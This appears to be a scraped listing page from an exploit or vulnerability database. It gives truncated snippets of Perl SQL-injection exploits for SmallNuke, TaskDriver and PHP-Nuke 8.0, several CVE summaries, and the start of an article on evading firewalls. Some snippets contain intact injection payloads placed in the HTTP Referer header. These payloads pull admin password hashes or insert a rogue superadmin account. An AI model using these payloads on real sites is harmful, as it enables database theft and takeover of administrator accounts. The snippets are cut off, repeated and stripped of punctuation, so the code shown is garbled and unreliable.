SmallNuke 2.0.4 - Pass Recovery SQL Injection

SmallNuke 2.0.4 - Pass Recovery SQL Injection !/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x365' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text =...

SmallNuke 2.0.4 - Pass Recovery SQL Injection

!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x365' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text = 'Smallnuke cms 'Tahoma 7...

DEBIAN-CVE-2007-4211

The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a 1 COPY or 2 APPEND command...

CVE-2007-4211

The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a 1 COPY or 2 APPEND command...

Default credentials

The Jedox Palo 1.5 client transmits the password in cleartext, which might allow remote attackers to obtain the password by sniffing the network, as demonstrated by starting Excel with the Palo plugin, opening a cube, and performing an Insert View...

CVE-2007-3581

The Jedox Palo 1.5 client transmits the password in cleartext, which might allow remote attackers to obtain the password by sniffing the network, as demonstrated by starting Excel with the Palo plugin, opening a cube, and performing an Insert View...

CVE-2007-2759

Multiple SQL injection vulnerabilities in the insert function in the ValuePreference class grid/ed/ValuePreference.java in Adempiere before 3.1.6 allow remote attackers to execute arbitrary SQL commands via the 1 mAttribute or 2 mValue parameter. NOTE: some of these details are obtained from thir...

TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit

Exploit for unknown platform in category web applications ==================================================== TaskDriver = 1.2 Login Bypass/SQL Injection Exploit ==================================================== !/usr/bin/perl -w TaskDriver = 1.2 Login Bypass/SQL Injection Exploit Discovered...

VP-ASP-SQL.txt

!!! WARNING !!! FOR EDUCATIONAL PURPOSES ONLY! Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, including without limitation an...

Five ways to evade firewall control system-vulnerability warning-the black bar safety net

As Trojan, Backdoor non-stop development, the firewall itself is also in constant development, which is a spear and shield and relationships, know how to escape through the firewall for the control of a system is very important. Due to the firewall of development, today, many firewalls are based ...

CVE-2006-7100

PHP remote file inclusion vulnerability in includes/functionsmoduser.php in phpBB Insert User 0.1.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

CVE-2006-7100

CVE-2006-7100 is a PHP remote file inclusion vulnerability in the phpBB Insert User extension (version 0.1.2 and earlier). The flaw resides in includes/functions_mod_user.php and allows remote attackers to execute arbitrary PHP code by supplying a URL in the phpbb_root_path parameter. Affected pr...

CVE-2006-7100

PHP remote file inclusion vulnerability in includes/functionsmoduser.php in phpBB Insert User 0.1.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

phpnuke80-blindsql.txt

------=Part7054910889112.1171994685834 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/...

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection !/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer;...

PHP-Nuke 8.0 Final - &#039;INSERT&#039; SQL Injection

!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God', 'http://www.krasza.int.pl', '[email protected]', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1'...

PHP-Nuke 8.0 Final - INSERT Blind SQL Injection (MySQL)

PHP-Nuke 8.0 Final - INSERT Blind SQL Injection MySQL !/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection

!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer; $respone=$ua-request$zadanie; $respone-issuccess or die...

PHP-Nuke 8.0 Final - &#039;INSERT&#039; Blind SQL Injection (MySQL)

!/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...

PHP-Nuke &lt;= 8.0 Final (INSERT) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl 0day exploit for PHP-nuke =8.0 Final Sql injection attack in INSERT syntax version for every basePostgreSQL,mssql... except MySQL base Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke =8.0 Final Sql injection atta...